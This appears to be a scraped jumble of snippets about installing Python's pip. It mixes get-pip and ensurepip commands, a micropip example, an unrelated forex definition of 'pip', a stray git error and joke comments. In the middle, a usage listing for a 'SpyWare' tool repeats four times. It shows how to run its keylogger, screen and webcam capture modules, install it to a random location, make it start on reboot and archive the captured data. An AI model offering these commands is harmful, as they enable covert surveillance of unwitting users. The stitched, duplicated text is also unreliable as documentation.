## To install Pip, first download get-pip.py from:
## Then run the following command in the command line
## in the folder where the file has been saved.
python get-pip.py
# in Powershell, e.g. install pandas
pip install pandas
# in Bash
sudo apt install python3-pandas
pip is a package-management system written in Python used to install and manage software packages.
$ python -m ensurepip --upgrade
Pip is a replacement for easy_install.
Packages installs the packages default under site-packages.
pip is a package manager for Python. That means it’s a tool that allows you to install and manage libraries and dependencies that are not distributed as part of the standard library.
SpyWare # Run all modules
SpyWare runonly -s # Run only screen module
SpyWare runonly --screen --key # Run only screen module and keylogger
SpyWare runonly --key my.conf # Run only module key with custom configuration file
SpyWare --install # Install spyware in random destination, enable it and run all modules
SpyWare --enable # Enable the SpyWare (start on reboot)
SpyWare --env "keySpy.conf=my.conf" # Add an environment variable (this defined the name of the custom configuration file for the keylogger)
SpyWare donotrun --domains --webcam # Run all modules except domains and webcam
# Following arguments are executed on python exit
# To stop the spyware you should raise a KeyboardInterrupt (Ctrl-C in the terminal)
# Is not working on OS shutdown or process kill
SpyWare --remove # Remove all files generated by the SpyWare and the SpyWare (the executable file only)
SpyWare --tar # Add data generated by the SpyWare in a .tar archive
SpyWare --tar "gz" # Add data generated by the SpyWare in a .tar.gz archive (compressed)
SpyWare # Run all modules
SpyWare runonly -s # Run only screen module
SpyWare runonly --screen --key # Run only screen module and keylogger
SpyWare runonly --key my.conf # Run only module key with custom configuration file
SpyWare --install # Install spyware in random destination, enable it and run all modules
SpyWare --enable # Enable the SpyWare (start on reboot)
SpyWare --env "keySpy.conf=my.conf" # Add an environment variable (this defined the name of the custom configuration file for the keylogger)
SpyWare donotrun --domains --webcam # Run all modules except domains and webcam
# Following arguments are executed on python exit
# To stop the spyware you should raise a KeyboardInterrupt (Ctrl-C in the terminal)
# Is not working on OS shutdown or process kill
SpyWare --remove # Remove all files generated by the SpyWare and the SpyWare (the executable file only)
SpyWare --tar # Add data generated by the SpyWare in a .tar archive
SpyWare --tar "gz" # Add data generated by the SpyWare in a .tar.gz archive (compressed)
SpyWare # Run all modules
SpyWare runonly -s # Run only screen module
SpyWare runonly --screen --key # Run only screen module and keylogger
SpyWare runonly --key my.conf # Run only module key with custom configuration file
SpyWare --install # Install spyware in random destination, enable it and run all modules
SpyWare --enable # Enable the SpyWare (start on reboot)
SpyWare --env "keySpy.conf=my.conf" # Add an environment variable (this defined the name of the custom configuration file for the keylogger)
SpyWare donotrun --domains --webcam # Run all modules except domains and webcam
# Following arguments are executed on python exit
# To stop the spyware you should raise a KeyboardInterrupt (Ctrl-C in the terminal)
# Is not working on OS shutdown or process kill
SpyWare --remove # Remove all files generated by the SpyWare and the SpyWare (the executable file only)
SpyWare --tar # Add data generated by the SpyWare in a .tar archive
SpyWare --tar "gz" # Add data generated by the SpyWare in a .tar.gz archive (compressed)
SpyWare # Run all modules
SpyWare runonly -s # Run only screen module
SpyWare runonly --screen --key # Run only screen module and keylogger
SpyWare runonly --key my.conf # Run only module key with custom configuration file
SpyWare --install # Install spyware in random destination, enable it and run all modules
SpyWare --enable # Enable the SpyWare (start on reboot)
SpyWare --env "keySpy.conf=my.conf" # Add an environment variable (this defined the name of the custom configuration file for the keylogger)
SpyWare donotrun --domains --webcam # Run all modules except domains and webcam
# Following arguments are executed on python exit
# To stop the spyware you should raise a KeyboardInterrupt (Ctrl-C in the terminal)
# Is not working on OS shutdown or process kill
SpyWare --remove # Remove all files generated by the SpyWare and the SpyWare (the executable file only)
SpyWare --tar # Add data generated by the SpyWare in a .tar archive
SpyWare --tar "gz" # Add data generated by the SpyWare in a .tar.gz archive (compressed)
python3.10 -m pip list
"Pip" is an acronym for percentage in point or price interest point. A pip is the smallest whole unit price move that an exchange rate can make, based on forex market convention.
import micropip
>>> await micropip.install('regex')
>>> package_list = micropip.list()
>>> print(package_list)
Name | Version | Source
----------------- | -------- | -------
regex | 2021.7.6 | pyodide
>>> "regex" in package_list
python -m pip <pip arguments>
#This is best way to do By CodeWithAnkit
#the best way to install pip if uninstalled is using the following command
python -m ensurepip
# not only it will check whether there is pip installed , it will install
# for you if not found
When the module is already installed, it'll say this!
Requirement already satisfied: PyYAML==5.3.1 in /usr/local/lib/python3.7/dist-packages (5.3.1)
fatal: destination path 'first-order-model' already exists and is not an empty directory.
pip is really poggers
py -m pip install
pip install <package name>
#This installs the files.
import <package name>
#This makes the classes and functions in the files ready for use in your Python project.
#Some packages are pre-installed, you can import them using import <package name> without installing them via pip install <package name>.
#This website has a list of pre-installed packages - https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html.